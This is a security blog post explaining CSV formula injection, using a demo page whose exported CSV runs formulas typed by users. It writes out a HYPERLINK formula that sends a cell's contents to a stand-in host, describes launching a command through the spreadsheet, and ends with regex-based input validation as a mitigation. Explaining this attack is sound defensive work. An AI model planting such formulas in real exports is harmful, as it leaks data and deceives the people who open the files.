Índice

Título
Título
Índice
Índice
Índice
Título
Título
Título

Ataques

Is that CSV secure? Defining CSV injection vulnerabilities

cover-is-csv-secure
cover-is-csv-secure
cover-is-csv-secure
cover-is-csv-secure
Jonathan Armas

Analista de segurança

Atualizado

22 de dez. de 2017

2 min

Comma-Separated Values file (or CSV) is a type of file that stores tabular data, numbers and text in plain text. Each line of the file is a data record and each record consists of one or more fields separated by commas. CSV is a common data exchange format that is widely supported by consumer, business, and scientific applications. As an example, a user may need to transfer information from a database program that stores data in a proprietary format, to a spreadsheet that uses a completely different format. The database program most likely can export its data as "CSV"; the exported CSV file can then be imported by the spreadsheet program.

CSV example

There is a vulnerability in this types of format that the most of programmers ignores, that is "CSV Injection". As OWASP says, it occurs when websites embed untrusted input inside CSV files, when a spreadsheet program is used to open a CSV file, any cell starting with '=' is considered as a formula and crafted formulas can be used to malicious attacks.

CSV injection example

We have a page that stores data on a table and exports it on a CSV file

CSV example

We put some normal data and nothing happens

Normal inputNormal result

But what happens if we put a formula like =2+5 in a field?

Formula inputFormula result

On our table, nothing happens, but when we open the CSV file we get the result of the formula that we introduced. This can be very dangerous if someone introduce a more dangerous code like

  =HYPERLINK("http://dangerous.com?x="&A3&"[CR]

When the user open the file it shows a link with our malicious site

link malicious

Also, we can execute commands on the target with this formula injection, in where we open the calc when someone opens the CSV file

It shows some warnings but the user trust in the source of the file and accept

First warningSecond warning

And then the code execution

Code execution

The effectiveness of this vulnerability is that the user trust on the source of the file without asking himself if is the normal behaviour when someone opens a CSV file and the program asks form permission

Solution

  • First is user awareness, because Windows shows an alert when someone puts command execution code in the CSV file like we’ve seen

  • Second, input validation, the most common characters to do this attack are:

A developer could make a validation like this regex

validation.js.

var regexp = new RegExp(/([=,-,+,@])/g);

And blocking this types of input, also, can put a space between the dangerous character like ' =' to mitigate this vulnerability

if(regexp.test(formData.sdata1)){
  formData.sdata1 = " "+formData.sdata1
}
if(regexp.test(formData.sdata2)){
  formData.sdata2 = " "+formData.sdata2
}

In this example we can see that the spreadsheet program doesn’t calculate the formula and our input is secure

Secure inputSecure result

The source code of the page for testing can be found here.

Get started with Fluid Attacks' ASPM solution right now

Tags:

cibersegurança

vulnerabilidade

codigo

web

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

Comece seu teste gratuito de 21 dias

Descubra os benefícios de nossa solução de Hacking Contínuo, da qual empresas de todos os tamanhos já desfrutam.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.

As soluções da Fluid Attacks permitem que as organizações identifiquem, priorizem e corrijam vulnerabilidades em seus softwares ao longo do SDLC. Com o apoio de IA, ferramentas automatizadas e pentesters, a Fluid Attacks acelera a mitigação da exposição ao risco das empresas e fortalece sua postura de cibersegurança.

Assine nossa newsletter

Mantenha-se atualizado sobre nossos próximos eventos e os últimos posts do blog, advisories e outros recursos interessantes.